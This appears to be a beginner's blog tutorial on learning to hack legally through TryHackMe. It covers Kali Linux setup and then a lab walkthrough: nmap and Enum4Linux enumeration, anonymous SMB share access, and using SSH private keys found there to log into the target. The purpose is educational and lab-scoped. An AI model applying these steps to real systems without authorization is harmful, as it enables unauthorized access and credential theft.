How can you learn to hack — without breaking the rules?
You might be an expert at learning new skills. But how do you learn to hack real-world vulnerabilities without landing in trouble?
There are 3 reasons why I think learning how to hack is an important skill:
1. Explosive growth in connected systems and vulnerabilities
It’s no surprise that the pace of data generation continues to accelerate — it is estimated that in the financial services sector alone, the data generated per second will grow over 700% in 2021. But along with this increased pace in data generation and connected surfaces, comes increased vulnerabilities. Recent events illustrate how hackers are taking advantage of all possible vulnerabilities, such as supply chain vulnerabilities — taking down multiple organizations at the same time by attacking a common trusted vendor. This is what happened in the Dec 2020 discovery of the SolarWinds Orion breach that impacted multiple Fortune 500 companies and governmental organizations. A basic knowledge in vulnerabilities between networked systems and how hackers take advantage of such vulnerabilities could help those in charge of generating and using data be better prepared to reduce the risks of cyber-attacks.
2. A great way to learn networking fundamentals:
Pablo Picasso once said:
“Learn the rules like a pro, so you can break them like an artist”
Learning to hack teaches you solid Linux, networking, and Internet fundamentals — all important data science fundamentals. Also during the process of hacking you learn how various protocols are built, and get a deeper understanding by enumerating and exploiting vulnerabilities.
3. Jobs, Jobs, Jobs!
All of this sounds interesting, but where’s the money?
There is a growing job market in cybersecurity, and cybersecurity shortage. A recent study predicts a $15,000 salary boost for employees with cloud security skills. Companies are expected to use AI based technologies to complement existing cybersecurity approaches, this could lead to a new demand for skilled employees at the interface of multiple fields like data science, machine learning, and cybersecurity.
OK now that you are convinced that hacking is worth putting some effort into…let’s begin!
Getting started with TryHackMe
TryHackMe is a website created by 2 cybersecurity students that found learning cybersecurity to be a fragmented and frustrating experience due to the lack of hands-on resources.
TryHackMe has rooms dedicated to learning concepts in cybersecurity. Each room contains multiple questions that you need to answer, in order to complete the room. This requires accessing (and attacking) TryHackMe machines dedicated to the room through it’s IP address.
These machines can be attacked through another computer (the attacking machine) that is provided by TryHackMe. An alternative is to attack the target machine over VPN through OpenVPN. Typically the lessons are not very straightforward, and it requires a combination of knowledge, persistence, and creativity (and of course — googling) to pass.
I prefer using the OpenVPN method, as I can have dedicated access to a Virtual Machine which I can then use to practice without necessarily connecting to TryHackMe. Also attacking a machine over VPN is much quicker than using TryHackMe’s attack machine — which for some reason is extremely slow.
Installing a Kali Linux Virtual Machine
Kali Linux is the hackers go to for operating systems. It comes with most hacking programs pre-installed. Nmap, Metasploit, Hydra, and much much more are literally a single line of code away. It is quite easy to install Kali Linux on a VMware machine.
First you need to download VMware for your operating system.
Next, download the Kali Linux virtual machine for VMware. That’s it, you are all set!
Exploiting common vulnerabilities
The Complete Beginner learning path on TryHackMe has a room on network services, and introduces some common vulnerabilities.
The first vulnerability mentioned is SMB — let’s use that for demonstrating the process of hacking. SMB or Server Message Block Protocol — is a communication protocol for sharing access to files, printers, serial ports, etc. on a network. SMB vulnerabilities have been featured in prominent cybersecurity incidents.
For example, the 2017 WannaCry ransomware that targeted and encrypted data on computers running Windows (and demanded ransomware in return for decryption) exploited a vulnerability in Microsoft’s implementation of SMB.
This room is basically oriented around finding SSH credentials of a particular user which is stored on an SMB file share that is not properly configured.
Connecting to TryHackMe and the target machine
First, download the TryHackMe OpenVPN configuration pack for Linux.
Next, connect to the TryHackMe servers through OpenVPN.
If you are successfully connected, you should see a tick near the connected button.
Next, go ahead and open the TryHackMe room on network services. Click on start the machine, and you should see the IP address.
Now you are all set to start the hacking process and exploit the SMB vulnerability!
The first part of the process is enumeration: to find out as much information as possible on the service, application, and operating system once you know the target IP address. A great tool for this is Nmap. Nmap is an open source network scanner that reveals open ports and the communication protocols used. Running:
nmap [IP address]
gives a list of open ports among the first 1000 ports. As you can see below, 3 ports are open.
Enum4Linux is a great tool (pre-installed on Kali Linux) for enumeration. Through Enum4Linux, you can find a file share that sticks out, named “profiles,” that seems to contain user profile information.
The next step is exploitation — to see if the information we got from enumeration can be used to gain access to the machine. We use the smbclient to see if we can gain access to the SMB share through an anonymous identity.
In this case, the SMB share has been improperly configured to let an anonymous user (username: Anonymous, blank password) access the profiles share.
You get lucky and find the user’s .ssh directory within the share.
As you suspect, the .ssh folder contains the RSA public/private keys.
You can download the keys to your local computer using:
On your local computer, from the id_rsa.pub file, you see that the username is cactus
RSA public keys and username from id_rsa.pub file
Next, copy both keys into the ~/.ssh directory, and change the permissions of the id_rsa file (chmod 600 ~/.ssh/id_rsa) — so that you have read and write access to the file). And now you can ssh into the compromised machine!
Congratulations, you have completed the room!
Apart from SMB, TryHackMe features numerous other communication protocols and vulnerabilities to exploit.
There’s currently a cybersecurity talent drought — by some estimates there is a gap of around 3 million qualified cybersecurity professionals. I’ve shown how to get started in learning how to enumerate and exploit vulnerable IP address. However, cybersecurity is much more than just preventing individual exploits from occurring. Due to the complexity in connected interfaces, it is becoming harder and harder to secure systems against attackers.
This is why there are huge opportunities at the intersection of AI and cybersecurity. The UK company Darktrace which recently went public says it stops cyber disruptions through self-learning AI. Recently, Darktrace has partnered with Microsoft to protect organizations that use various Microsoft services.
I hope this tutorial motivates you towards your hacking journey! You may not end up becoming a penetration tester, but there is a lot you can learn during the process of gaining cybersecurity skills. And who knows, maybe you land an awesome career at the intersection of AI, and cybersecurity!
Senior Data Scientist in NLP. Creator of https://www.answerchatai.com/